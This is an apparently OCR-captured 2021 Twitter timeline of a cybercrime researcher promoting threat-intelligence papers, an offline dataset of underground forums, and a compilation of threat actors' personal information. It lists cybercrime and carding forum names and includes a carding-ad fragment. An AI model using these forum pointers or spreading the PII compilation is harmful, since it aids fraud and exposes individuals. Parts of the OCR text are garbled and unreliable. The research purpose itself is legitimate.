365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuitvn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum Zloy.bz Mmpg.ru Tenebris 
Antichat.ru ForumSape = Mr11-11mr-7olm_org TheBot 
ArmadaBoard ForumSEO Nulinoss.org Toolbabase se 
BigFozzy Free-hack pay-per-install org TotalBlackhat 
BlackhatWorld ghostmarket net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta pw Vsehobby 
Cardvilla GoFuckBiz Procrd Webmasters.ru 
Chi gofuckbiz.com ProLogic Whitehatyn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase WYAW.Opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked.to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket la iFud 


10:38 
My second white paper for @whoisxmlapi is now live! https://t.co/vIXE84kbBd CC: 
@Hostinger #Security #cybercrime #malware #CyberSecurity #CyberAttack 
#cybersecuritytips #cyberattacks #Threatintel #Threatintelligence #ThreatHunting 


22 *%1 
10:46 
I’m on the front page - https://t.co/YNcm9lAcsr CC: @whoisxmlapi here’s the actual 
podcast - https://t.co/c78SWm2HXv #security #cybercrime #malware 
#CyberSecurity #CyberAttack #cyberattacks #Threatintel #Threatintelligence 
#ThreatHunting https://t.co/g5cFuoAPnS 
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21:24 @ Eh - 
( = @ ~whoisxmlapi.com 


= © WhoisXMLAPI Login Sign Us } Order now | 


DNS Sonar Report #11: 
Dancho Danches 


Listen now 


Domain & IP Data 
Intelligence for Greater 
Enterprise Security 


on gathering, analyzing, and 
emet more 


decade, we 


f cyber threat 


Get started free 


re than 50K satisfied cu 


10:55 
https://t.co/BCwaiEmKd5 #RansomwaretTaskForce Stay tuned! 


https://t.co/g9kp2apGZN 


144 


30 - Friday 


06:55 


18:54 & & @ - Moe 840 


¢ Tweet 


Dancho Danchev @dancho 11 Nov 20 

© New Post - "Exposing Protonmail and 
Tutanota's Illicit Abuse by Ransomware 
Gangs - A Compilation of Currently Active 
Ransomware-Themed Email Addresses” - 
is.gd/NPLLq5 CC: @ProtonMail 
@TutanotaTeam #security #cybercrime 
#malware #Threatintelligence 


ProtonMail @ 
@ProtonMail 


Replying to @dancho_danchev and @TutanotaTeam 
Thanks for the report, we have 

zero tolerance for abuse and 

we'll investigate this and take the 
appropriate actions. 

17:52 - 11 Nov 20 - Twitter Web App 


1 Quote Tweet 


0 a) Q — 


Tweet your reply (9) 


Guys. Check this out. This is the Hungarian entry for https://t.co/BTusMsPDol on 


Wikipedia. | wanted to say big thanks to everyone who offered support both 


operational and technical know-how including the usual "keep up the good work" for 


making this project happen. https://t.co/D1sZI5Zv64 
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22:51 & Eh @ « of 4g 


QO @ humwikipedia.org/wiki/Astala © 


Astalavista.box.sk 


Page type search engine 
Categories search page 
Available language (s) English 
Establishment 1994 
Editor-in-Chief Dancho Danchev 
URL box.sk 


The website operated under a Slovak domain name . 
The name of the website is based on a movie pun. In 
the sci-fi action movie Terminator 2 - The Day of 
Judgment , the protagonist's character had a 
memorable phrase, “Hasta la vista, baby,” a phrase in 
Spanish that is a commonly used farewell formula. 
The “astalavista” of this sentence is the merging of 
the player. It's worth noting that AltaVista , another 
well-known search engine of the era that sounded 
similar , was only launched in 1995, “! 


In December 2020, cybercrime researcher and 
analyst Dancho Danchey, as the operator of the site, 
announced the relaunch of the website under the 
domain name box.sk, It is designed to support 
hackers and cybersecurity experts. !"! 


v Notes 


v Translation 


Ee HUNGARIAN ENGLISH : x 


19:00 


New white paper and a case study courtesy of me for @whoisxmlapi in combination 
with @MaltegoHQ - "Profiling a Money Mule Recruitment Registrant Emails Portfolio - 
An Analysis" - https://t.co/b3rlcYFMTi #security #cybercrime #malware 


21 *l1 
19:01 


New white paper and a case study courtesy of me for @whoisxmlapi in combination 
with @MaltegoHQ - "Profiling a Rogue Fast-Flux Botnet Infrastructure That’s Currently 
Hosting Multiple Online Cybercrime Enterprises - An Analysis" - 
https://t.co/uyr5aXdPRL 

19:02 
New white paper and a case study courtesy of me for @whoisxmlapi in combination 
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with @MaltegoHQ - "Profiling the “Jabber ZeuS” Rogue Botnet Enterprise - An 
Analysis" - https://t.co/O6IRUSVOWB #security #cybercrime #malware 


21 *l 
19:03 


New white paper and a case study courtesy of me for @whoisxmlapi in combination 
with @MaltegoHQ - "Exposing a Fraudulent Boutique and Rogue Cybercrime-Friendly 
Forum Community - An Analysis" - https://t.co/Jux2s05X67 #security #cybercrime 
#malware 


el *2 
19:04 


New white paper and a case study courtesy of me for @whoisxmlapi in combination 
with @MaltegoHQ - "Exposing a Rogue Domain Portfolio of Fake News Sites - An 
Analysis" - https://t.co/mi2qMdZB3N #security #cybercrime #malware 


21 %1 


May 


2 - Sunday 


21:25 


New Post - "Dancho Danchev’s Law Enforcement and OSINT Operation "Uncle 

George" - An Update - Collected ICQ, Cryptocurrency, XMPP/Jabber, Phone, QQ, 

Telegram and Viber Accounts" https://t.co/Pwf98ffLhO #security #cybercrime 
#malware 


*%2 


3 - Monday 


20:12 


Who wants to obtain access to my Cybercrime Forum Data Set for 2021? Drop mea 
line at dancho.danchev@hush.com #security #cybercrime #malware 
https://t.co/K1InJzFtvUs 


147 
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GYBERCRIME 
FORUM DATA 
SET 2021 


OVER 11] FULL OFFLINE COPIES 


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
TO OBTAIN A FREE COPY! 


5 - Wednesday 


05:46 


Folks. Special Easter Discount for my Cybercrime Forum Data Set for 2021 priced at 
$200 for the entire Data Set. Grab a copy today! https://t.co/gsp1kiWxle #security 
#cybercrime #malware #CyberSecurity #CyberAttack #ThreatHunting 
#Threatintelligence 


21 


07:26 


Folks. Check this out! Cybercrime Forum Data Set for 2021. https://t.co/gsp1kiWxle 
Grab a copy today! https://t.co/msRCzcmxlO 
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GYBERCRIM ME 
FORUM DATA 
SET 2021 


OVER Ill FULL OFFLINE COPIES 


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
TO OBTAIN A FREE COPY! 


07:27 


Folks. Check this out! Cybercrime Forum Data Set for 2021. https://t.co/gsp1kiWxle 
Grab a copy today! https://t.co/moOvBp4onr 
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=e 4HatDay.rar 

=e 11Wang.rar 

=e aHack.rar 

S Aljyyosh.rar 

N=} alligator.cash.rar 
N=} Antichat.ru.rar 
A=} ArmadaBoard.rar 
N=} BigFozzy.rar 

SB BlackhatWorld.rar 
= blacktip.top.rar 


07:27 


Folks. Check this out! Cybercrime Forum Data Set for 2021. https://t.co/gsp1kiWxle 
Grab a copy today! https://t.co/VO3uBrOUXQ 


S ica.su.rar 

S iFud.rar 

eS iHonker.rar 
=e imhatimi.org.rar 
eS iransec.net.rar 
BS it-24h.com.rar 
eS itsobr.com.rar 
eS LinkFeed.rar 
eS Linuxac.org.rar 
BS Master-X.rar 
=e MaulTalk.rar 


07:28 


Folks. Check this out! Cybercrime Forum Data Set for 2021. https://t.co/gsp1kiWxle 
Grab a copy today! https://t.co/Cm7ycDyDtk 


$B verified.bz 

S Webmasters.ru.rar 

S Whitehat.vn.rar 

$3 WWH-Club.rar 

N=} www.forohack.com.rar 
=e WWW.Opensc.ws.rar 
eS www.ryan1918.com.rar 
N= Xakep.bg.rar 

eS xaker.name.rar 

= xaknet.org.rar 

= Zismo.rar 
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08:29 


https://t.co/H7ZRZUN59S #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintel #Threatintelligence 


6 - Thursday 


03:30 


https://t.co/PvaJoRukgA #security #cybercrime #malware #CyberSecurity 
#CyberAttack #Threatintelligence #Threatintel 


17:32 
https://t.co/ZSKjqcPcIM #NowPlaying 
17:42 


Folks. Check this out - https://t.co/oxA5HU7Qp3 here’s my original analysis - 
https://t.co/O3tnrwQbK7 #SolarWinds https://t.co/t{SMRAnmGZv 
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We have no intentions to shame the organizations that have installed a 
backdoored SolarWinds Orion update, regardless if they were targeted 
by the threat actor or not. In fact, the supply chain security problem is an 
extremely difficult one to tackle, even for companies and organizations 
with very high security standards. This could have happened to anyone! 


However, since multiple passive DNS logs and SUNBURST victim lists 
have been circulating through publicly available channels for over a 
month, we felt that it was now acceptable to publicly write about the 
analysis we've been doing based on all this data. We'd also like to thank 
everyone who has helped collect and share passive DNS data, including 
John Bambenek, Joe Stowik, Rohit Bansal, Dancho Danchev , Paul Vixie 
and VriesHd. This open data has been crucial in order to develop and 
verify our SunburstDomainDecoder tool, which has been leveraged by 
numerous incident response teams to perform forensic analysis of DNS 
traffic from their SolarWinds Orion deployments. 


More Credits 


We'd like to thank CERT-SE and all other computer emergency response 
organizations that have helped us with the task of notifying 
organizations that were identified as targeted. We would also like to 
applaud companies and organizations like FireEye, Palo Alto Networks 
Fidelis Cybersecurity, Microsoft, the U.S. Department of Energy and the 
U.S. Federal Courts for being transparent and publicly announcing that 
the SUNBURST backdoor had been used in an attempt to compromise 
their networks. 


7 - Friday 


09:23 
New layout - https://t.co/fnswrm8KWP https://t.co/q44fZxQdtM 
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SUBSCRIBE TO OUR 


NEWSLETTER 


FOR UPDATES AND EXCLUSIVE CONTENT! 


a= oOo © 


Sample Screenshot of Astalavista. box.sk's Desktop Application - The Search Engine's Power on Your Desktop 


Sample Keywords 


~ Crack 


8 - Saturday 


04:31 


Folks. Check out the new layout at https://t.co/fnswrm8KWP including our new and 
flagship free Desktop application. The World’s largest and most popular search 
engine for hackers and security experts available online 24/7 with over 3M search 
engine results. https://t.co/oX4305E4fW 
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10 - Monday 


09:10 


#NewProfilePic https://t.co/6LFWvaLvdE 
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105 WCLupin 
SECURITY 272 
RAUL SitES 


10:41 


Thanks to @whoisxmlapi for mentioning my recent discovery of a C&amp;C hosting 
infrastructure using @Hostinger free web site hosting service. 
https://t.co/J6e7 LDHM9t #security #cybercrime #malware #CyberAttack 
#CyberSecurity #Threatintelligence #Threatintel 


13 - Thursday 


03:07 


Thanks to @whoisxmlapi for featuring my latest white paper detailing the activities of 
a currently active typosquatting campaign that’s impersonating a well-known 
cybercrime researcher. https://t.co/FAVKGDzskL 
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15 - Saturday 
02:34 


Sightseeing. https://t.co/lwUpMtWEeB 


16 - Sunday 


07:54 


https://t.co/qsiTxLwmK1 #security #cybercrime #malware #CyberAttack 
#CyberSecurity #cybersecuritytips #ThreatHunting 


18 - Tuesday 


01:14 


My latest white paper for @whoisxmlapi is now live. It details the activities of the 
Emotet botnet using Maltego in combination with WhoisXML API’s integration. 
https://t.co/GapYUTnxOa Enjoy! 


01:20 


My second white paper for @whoisxmlapi is now live. It discusses in-depth a recently 
discovered social engineering campaign targeting legitimate security researchers. 
https://t.co/7CIYIKHUjm Enjoy! 


01:33 


“Thanks to Dancho Danchev, WhoisXML API’s DNS Threat Researcher, for the initial 
investigation available here, which led to the creation of this post." - 
https://t.co/J6e7 1DHM9t 


01:37 
I’m on Amazon. - https://t.co/BZWwkLxXujF 
01:39 
My presentations. https://t.co/nNsXMPrGi0O 
01:43 
Listen to my latest podcast for @whoisxmlapi - https://t.co/MDkvbEPrT6 
01:46 
Check out my official personal blog full offline E-book compilation - 
https://t.co/JT676NfPZI 
01:49 
Check out this interview with me - https://t.co/glQoxvUWSs 
01:52 
Check out this interview with me - https://t.co/WeXBlboxrA 
11:00 


Cheers! https://t.co/WhGzweAece 
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19 - Wednesday 


08:02 


Who wants to obtain free access to my Cybercrime Forum Data Set for 2021 for free 
for research purposes? Drop me a line at dancho.danchev@hush.com 
https://t.co/ZswOuO9Whb 


20 - Thursday 


09:34 


ZW] 


GYBERCRIME 
FORUM DATA 
SET 2091 


OVER Ill FULL OFFLINE COPIES 


(19GB) OF PUBLICLY 
ACCESSIBLE CYBERCRIME 
FORUM COMMUNITIES. FREE TO 
DOWNLOAD FOR PROCESSING 
AND ENRICHMENT. 


APPROACH ME AT 
DANCHO.DANCHEV@HUSH IN ORDER 
TO OBTAIN A FREE COPY! 


Cheers! https://t.co/Hl48ua8TKc 
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Bosh lOpykos 

yurukov.net/blog 

Bonrapun 8 4yxK6uHa, KOTO Munee 
MHOro NoBeve 3a CTpaHaTa, OTKONKOTO 
ronaMa YacT OT 6oNrapuTe, KMBeeU Ha 
TepvTOpUATa Ha AbPxXaBara. 


BaD 


Qianvo Jlanves 

ddanchev. blogspot.com 

To e Moe 6u Hait-BNMATENHMAT 
6vnrapckn Gnorep B CBeTOBeH Maua6 - 
TEXHMYECKH eKCNepT B O6NacTTa Ha 
KMGepcurypHoctTta. 


Vieax Bakanos 

e-vestnik.bg 

EQuk OT MaNKOTO OCTaHann OCTpOBM Ha 

CBO60fHOTO Hu CBOGORONIO6uBOTO 

MUCNeHe, CNMCBAH Npodecuonanno u 

oTNMYaBall Ce C pequua CbBMeCTHH 
KayecTBeHn Ny6nukauMn Cc Apyrn 


6norosBe. 
Hespena [oposa 
semkiibonbonki.blogspot.com 
5 TA He Ce NpegaBa BHNPeKM BCMYKM 
3 TPYQHOCTH, C KOUTO Ce C6NbCKBa, WM 


NpoAbMKaba HEYMOPHO Aa paskpuBa 
Hegbsnte Ha 6enrapcKata nonuTuka. 


21:40 


Thanks @whoisxmlapi for mentioning my research - "Thanks to Dancho Danchev, 
WhoisXML API's DNS Threat Researcher, for the original investigations available here, 
which led to the creation of this post." - https://t.co/I2IwsIx56G 
https://t.co/oAECIhXGoy 
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automauto.com ge opozitiv.com soulvego.com transdeals44.cc 
21 - Friday 
04:40 
@Treadstone71LLC Try me here - "An OSINT conducted is a tax payer’s buck saved 
somewhere". 
22 *%1 
04:44 


@taosecurity This is where the basics of Technical Collection and threat intelligence 
come into play. Check out this post - https://t.co/voila4FF4W 


04:50 


Thanks @jabolins for following me! | sincerely hope that you’re still keeping track of 
my research at https://t.co/JTcqOaYgET Cheers! Dancho 
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22 - Saturday 


05:06 


https://t.co/qs5iTxLwmK1 #security #cybercrime #malware #CyberAttack 
#cyberattacks #Threatintel #ThreatHunting #ThreatIintelligence 


21:31 
Grab a copy today! https://t.co/JT676NfPZI https://t.co/1lxyslqSxpS 


Dancho Danchev 


An In-Depth Picture 
Inside Security 
Researcher's Dancho 
Danchev Understandin 
of Security Hacking ane 
Cybercrime Incidents 


Dancho 


Danchev's 
Personal 
Security 
Hacking and 
Cybercrime 
Research 
Memoir 


24 - Monday 


04:28 
https://t.co/ORdmSEx]ve #security #cybercrime #malware #CyberAttack 
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#CyberSecurity #cyberattacks #ThreatHunting #Threatintel 


25 - Tuesday 


02:48 


Folks. Check out my latest paper for @whoisxmlapi in combination with @MaltegoHQ 
- https://t.co/ey3Zu9inRE Enjoy! https://t.co/nRi5JkWExD 
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02:49 


This is my second white paper which I’ve recently produced for @whoisxmlapi in 
combination with @MaltegoHQ - https://t.co/yKBHb7ctED Enjoy! 
https://t.co/t5Piftb4pB 


12:54 


https://t.co/QnR4IlYyLS #security #cybercrime #malware #CyberAttack 
#CyberSecurity #ThreatHunting #Threatintelligence 


ral 
12:57 
https://t.co/XwcRxjxlA4 #security #cybercrime #malware #CyberAttack 
#CyberSecurity #ThreatHunting #Threatintelligence 
12:58 


https://t.co/2S64PGzZBO2 #security #cybercrime #malware #CyberAttack 
#CyberSecurity #ThreatHunting #Threatintelligence 


27 - Thursday 


09:37 
Folks. Check out my latest case study for @whoisxmlapi - https://t.co/pINUOWtTEt 
#security #cybercrime #malware #CyberAttack #CyberSecurity Enjoy! 
23:09 


https://t.co/n7jJ66hBGrY #security #cybercrime #malware #CyberSecurity 
#Threatintel https://t.co/DmMkRV8Da7N 
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AIR TICKETS & HOTELS 


FRESH STUFF 


DUMP + PIN TOM More 20rteacks 


28 - Friday 


02:11 


I’m urgently looking for a full-time or part time OSINT Analyst or Intelligence Analyst 
position within a major defense contractor or an actual U.S alphabetical agency 
Who’s interested? Direct hire propositions only - drop me a line at 
dancho.danchev@hush.com https://t.co/at5pmd9bcw 


23:46 


My latest white paper for @whoisxmlapi is now live. https://t.co/Bxlb5yCIfL 
https://t.co/9Mr39yyfkt 
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nick2chocolate@hotmail.com 
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n ghOstmarket.net 


29 - Saturday 


10:05 


https://t.co/7pEoKgDo3m #security #cybercrime #malware #CyberAttack 
#CyberSecurity #ThreatHunting 


30 - Sunday 


23:15 


https://t.co/J5KIL8ciT5 #security #cybercrime #malware #CyberAttack 
#threathunting 


22 *%1 
23:19 


https://t.co/Q8r3PsYkR4 #security #cybercrime #malware #CyberAttack 
#threathunting 


<1 *l 
23:38 


Check out my latest white paper for @whoisxmlapi - https://t.co/msirDOaJxQ 
https://t.co/cMqb6Mjk1lu 
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June 


3 - Thursday 


21:13 


Check out my latest white paper for @whoisxmlapi - https://t.co/eEp4MV5Pay 
#security #cybercrime #malware https://t.co/omWLRNcixXg 
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21:38 

https://t.co/VR1pzSpH4q 
21:39 

https://t.co/NpOydByqRu 
21:39 

https://t.co/BVxTWA7AML 
21:40 

https://t.co/HKaNdgiOAQ 
4 - Friday 
06:03 


My first article for @CyberNews - https://t.co/F9GdjOPCoO 
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6 - Sunday 


05:27 


Recommended reading - https://t.co/WQOxdQPzGV #cybercrime #malware 
#CyberAttack #ThreatIntel 


22 
08:06 


https://t.co/fnswrm8KWP #security #cybercrime #malware #CyberSecurity 
#CyberAttack #ThreatIntel https://t.co/DValiLBU3D 


https://t.co/GNKij2Dhyb #security #cybercrime #malware 
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9 - Wednesday 


07:09 


"Thanks to Dancho Danchev, WhoisXML API’s DNS Threat Researcher, for the original 
investigations available here, which led to the creation of this post". - 
https://t.co/I2Iws|x56G 
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10 - Thursday 


08:57 


“Thanks to Dancho Danchev, WhoisXML API’s DNS Threat Researcher for the original 


investigations available here and led to the creation of this post" - 


https://t.co/zkktkoJUL5 


11 - Friday 


01:02 
https://t.co/jz2|IVBtXu5 


04:08 
https://t.co/sFBCulmx43 


12 - Saturday 


22:52 

https://t.co/2AdYzaF2UN #security #cybercrime #malware 
21 *%2 
22:55 

https://t.co/ISAGNcpzqHN #security #cybercrime #malware 
13 - Sunday 
22:44 

https://t.co/9u5tSzr8zp #security #cybercrime #malware 
22:48 

https://t.co/kDbIOAIqzR #security #cybercrime #malware 
14 - Monday 
14:38 

https://t.co/qa4MIsIFnt #security #cybercrime #malware 
15 - Tuesday 
00:41 

https://t.co/va7iOJqQaG #security #cybercrime #malware 
20 - Sunday 


La 


11:49 
https://t.co/lhptwQO3hS #security #cybercrime #malware 


23 - Wednesday 


00:34 


“Thanks to Dancho Danchev, WhoisXML API’s DNS Threat Researcher for the original 
investigation available here which led to the creation of this post." - 
https://t.co/Av4B04M038 
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00:38 


https://t.co/L870T9SM1j #security #cybercrime #malware 
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00:42 
https://t.co/ORAqClYePM #security #cybercrime #malware 


24 - Thursday 


10:04 

https://t.co/ORAqClYePM #security #cybercrime #malware 
10:10 

https://t.co/MxEdbUPv2A #security #cybercrime #malware 
10:10 

https://t.co/gVtQ7wPK1D #security #cybercrime #malware 
10:10 

https://t.co/lIQS7jiO0ai #security #cybercrime #malware 

13:00 


Enjoy! #security #cybercrime #malware #CyberSecurity #CyberAttack 
#ThreatHunting #Threatintelligence #Threatintel https://t.co/U3McCkZWVj 
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All Warfare is Based on Deception 


with Do's cyber assets 


Our NIDS 
are 


detacting 


numerous 
traffic 
anomalies 
at some of 
our 
mailsevers. 


22:29 


22:29 


27 - Sunday 


06:17 


erie - 
deception! While 
they concentrate 
on the mail 
servers, we'll 
transmit back the 
data obtained 
from the infected 


unacceptable. Initiate an 
immediate traceback! 


from the Russian 
to faciliate OSINT 
through botnets. 
“Ensure your 
victory before 
starting a battie", 
said Sun Tzu! 


The Chinese are 
getting smarter 
Andrei. Last 


month they 
bought access to 
-mil and .gov 
infected hosts 
only, and look at 
this Pentagon 
puppet show now 


It's called 
“segmenting 
the attack 
population" 
Yuri. 
Perhaps we 
should print 
out new 
brochures. . 


https://t.co/AlwOJSMBS4 #security #cybercrime #malware 


https://t.co/zfkLWvtKzi #security #cybercrime #malware 


https://t.co/JTcqOaYgET https://t.co/HWwxpOVNWc 
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06:18 
https://t.co/JTcqOaYgET https://t.co/LtbxNOOWio 
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06:18 


https://t.co/JTcqOaYgET https://t.co/zicmhNBxXul 
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06:18 


https://t.co/JTcqOaYgET https://t.co/alF7qK8HGq 


176 
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https://t.co/JTcqOaYgET https://t.co/MCulCVBZF5 
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29 - Tuesday 


19:41 


Check out my latest white paper for @whoisxmlapi in combination with @MaltegoHQ. 
Enjoy! https://t.co/MAtbulhtLx 


21 %1 


July 


5 - Monday 


07:47 


Who wants to work with me on my upcoming memoir and ask me professional 
research questions?Are you familiar with my work at - https://t.co/JTcqOaYgET 
including here https://t.co/UZ6qVAhXVF feel free to reply or drop me a line at 

dancho.danchev@hush.com https://t.co/7UTe6kCf6S 
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6 - Tuesday 
04:10 


“Thanks to Dancho Danchev, WhoisXML API’s DNS Threat Researcher, for the original 
investigation available here and that led to the creation of this post". 
https://t.co/NFiKpVOTyg 


11:12 


It used to be a moment in time when we "used to rock the boat". It’s official - I’ve 
decided that this is going to be my last post on my personal blog - 
https://t.co/1tNrMb3jn4 Want to know more? Drop me a line at 
dancho.danchev@hush.com and say "hi". 
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8 - Thursday 


09:02 


"Thanks to Dancho Danchev, WhoisXML API’s DNS Threat Researcher for the original 
investigation available here which led to the creation of this post." - 
https://t.co/Av4B04M038 #security #cybercrime #malware 


el 


09:03 


"Our security researcher Dancho Danchev has been tracking the fake news network 
and provided indicators of compromise (loCs), specifically 27 domains known to have 
taken part in the network’s disinformation campaigns" - https://t.co/KGPVEVn92Y 


14:07 
#NowPlaying - https://t.co/zT5IJNsfXxd 


9 - Friday 


07:40 
RSA Europe 2012. https://t.co/yXp80aUkTh 


07:41 


RSA Europe 2012. https://t.co/co7p5mKVgO 
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07:41 


RSA Europe 2012. https://t.co/3vDneEvKae 
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Cyberterrorism 


ney of “cyberterrorism™ articles 


.- 


08:12 


@Wh1t3Rabbit | second that. It wasn’t necessarily that big of a conference but | got 
some pretty interesting questions including the following article - 
https://t.co/IJv9LOfPZp by the way am | still in for a podcast participation? Where can 
| reach you? Regards. Dancho 


14:22 


Folks. From an undislosed location with love. These personal and never-published 
before personal photos are in a way tribute to my grandparents who greatly shaped 
me and my professional career the way | am. Long story short they got me my first 

and several other PCs. God bless! https://t.co/OORTJw2Zuc 
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14:27 


https://t.co/39JWq7V8Md #security #cybercrime #malware 


10 - Saturday 


11:01 


https://t.co/JTcqOaYgET #security #cybercrime #malware #CyberSecurity 
#CyberAttack #ThreatHunting #Threatintel #Threatintelligence 
https://t.co/zeuXoYf5VX 
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DANCHO DANCHEV'S BLOG 


2 


\ } 


DANCHO DANCHEV'S "CYBER CONSPIRACY - WHO OWNS THEM ALL" 


11 - Sunday 


06:06 
Soliciting your feedback! Guys and girls can you please send me your research 
questions for my upcoming memoir by replying to this tweet? - 
https://t.co/JTcqOaYgET it would be greatly appreciated. Let’s get the conversation 


going! 
06:08 
An OSINT conducted today is a tax payer’s buck saved somewhere - 
https://t.co/TdjILwBBLb #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintelligence #Threatintel 
06:09 


If terrorism is a form of crime than cybercrime is a form of economic terrorism. 
#security #cybercrime #malware #CyberSecurity #ThreatHunting 
#Threatintelligence #Threatintel 
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20 - Tuesday 


06:28 
#NowPlaying - https://t.co/3eGMHGbboO 


21 - Wednesday 


10:37 


https://t.co/8BGO7YwCEp7 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 


10:37 
https://t.co/ezdqlA4Uyd #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 
1 
10:38 


https://t.co/UkYZqtigf5 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 


10:38 


https://t.co/tzInPphJM7 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 


10:39 


https://t.co/A56nPh3c8T #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 


10:39 


https://t.co/YSZ7CPm1p] #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 


10:39 
https://t.co/9FfBF2fltK #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #threatintel #Threatintelligence 
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22 - Thursday 


12:28 


https://t.co/o5p97xXOMp #security #cybercrime #malware #CyberSecurity 
#ThreatHunting #Threatintel #threatintelligence 


12:28 


https://t.co/VrECbY1mSA #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #threatintelligence 


12:29 


https://t.co/Mw5RcfUgmC #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #threatintelligence 


12:29 


https://t.co/5g|x4KAz58 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #threatintelligence 


12:29 


https://t.co/l1kaQ9wwkLd5 #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #threatintelligence 


12:30 


https://t.co/8gxavMjKvi #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #threatintelligence 


*1 
12:30 


https://t.co/sfFITBeCoL #security #cybercrime #malware #CyberSecurity 
#cyberattacks #ThreatHunting #Threatintel #threatintelligence 
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27 - Tuesday 


02:09 


https://t.co/wtf66GHZ1S #security #cybercrime #malware #CyberAttack 
#CyberSecurity #ThreatHunting 


28 - Wednesday 


12:11 
#NowPlaying - https://t.co/salcE8H5KS 


29 - Thursday 


03:41 


Folks. I’ve just finished my 2021 compilation entitled "Personally Identifiable 
Information Regarding Various Internationally Recognized Cyber Threat Actors". 
Interested in obtaining a copy? Drop me a line at dancho.danchev@hush.com 

https://t.co/C1SIVCZ5V5 
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Personally Identifiable Information Regarding some of the most High-Profile 
Internet Cybercriminals Cybercrime Gangs and Various Internationally Recognized 
Cyber Threat Actors — A 2021 Compilation 


By Dancho Danchev 
24.07.2021 


04:03 


Who wants a free copy of my latest compilation? Drop me a line at 
dancho.danchev@hush.com Cheers! #security #cybercrime #malware 
#CyberSecurity #CyberAttack #ThreatHunting https://t.co/lLm5BLwT5hD 
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Personally Identifiable Information Regarding some of the most High-Profile 
Internet Cybercriminals Cybercrime Gangs and Various Internationally Recognized 
Cyber Threat Actors — A 2021 Compilation 


By Dancho Danchev 
24.07.2021 


11:38 


https://t.co/kyI5GvScSi #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatHunting #Threatintelligence #threatintel 
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11:42 


https://t.co/R2YnpeTX7o #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatHunting #Threatintelligence #threatintel 
https://t.co/GB7XliQdsR 
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30 - Friday 


14:11 


https://t.co/FQbAnZoe9i #security #cybercrime #malware #CyberSecurity 
#CyberAttack #cyberattacks #ThreatHunting #threatintelligence 


31 - Saturday 


03:31 


Grab a free copy today! https://t.co/BGwwYV5mz6 #security #cybercrime #malware 
#CyberSecurity #CyberAttack #cyberattacks #ThreatDetection #ThreatHunting 
#Threatintel Cheers! 


21 
06:08 


https://t.co/uvAt5gK9BA #security #cybercrime #malware #cyberattacks #CyberSec 
#cyberthreats #ThreatHunting #threatintel #ThreatDetection 
https://t.co/zsMrM9LidV 


Main navigation 
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Search Engine 


Notification center 


O70 68 & 


About 


August 


6 - Friday 
07:15 
#NowPlaying - https://t.co/4naTAGr9uO 


07:17 


https://t.co/BGwwYV5mz6 #security #cybercrime #malware #CyberSecurity 
#CyberAttack #threatintelligence 
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07:23 


https://t.co/vVYLJAEABvg #cybercrime #malware #CyberSecurity #CyberAttack 
#threatintelligence 


22:55 


My latest white paper for @whoisxmlapi - https://t.co/woPPY5BB2F Enjoy! #security 
#cybercrime #malware #CyberSecurity #threathunting #threatintelligence 


23 - Monday 


12:03 
https://t.co/qLxz4GuRip #security #cybercrime #malware https://t.co/phOh9k91gK 


12:06 


https://t.co/JIcqOaYgET #security #cybercrime #malware #ThreatHunting 
#CyberSecurity #CyberAttack https://t.co/TrOFOalljN 
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25 - Wednesday 


01:45 
| offer OSINT/cybercrime research and threat intelligence gathering training. 
Approach me at disruptive.individuals@gmail.com or visit https://t.co/OmUajr8DT8 
and we can organize something. Also if you’re interested threat actor attribution I’m 
here to help. https://t.co/y5QsjYhQK2 


Disruptive 
oer 


02:46 
https://t.co/OmUajr8DT8 https://t.co/jA3n4FTdF6 
. 
oy tive 
dividuals 
09:59 


#NowPlaying - https://t.co/gtP9dxxQqo 


27 - Friday 


02:32 
Folks. Check out this analysis which | recently did on "Cyber Threats Facing U.K’s 
Based Internet-Connected Infrastructure". This is great stuff and I’m sure that you'll 
find the research informative. https://t.co/EoqHZoaY55 https://t.co/8K6fw1Xpfd 


04:23 
Guys and girls. Who has experience with security automation and can assist with 
some of their spare time to work with me on a crowd-sourced sensor for spam 
phishing and malware where the goal would be to build a crowd-sourced sensor for 
malicious activity? https://t.co/FWulez359W 
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23:35 


https://t.co/qLxz4GuRip #security #cybercrime #malware #CyberSecurity 
#Threatintel #threatintelligence https://t.co/pX3rOoFwVhW 
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Cyber 


Intelligence 


The Definite Cybercrime and Web 2.0 Memoir 
Courtesy of Dancho Danchev 
The RBN, The Koobface Botnet, The Rock Phish Gang, 
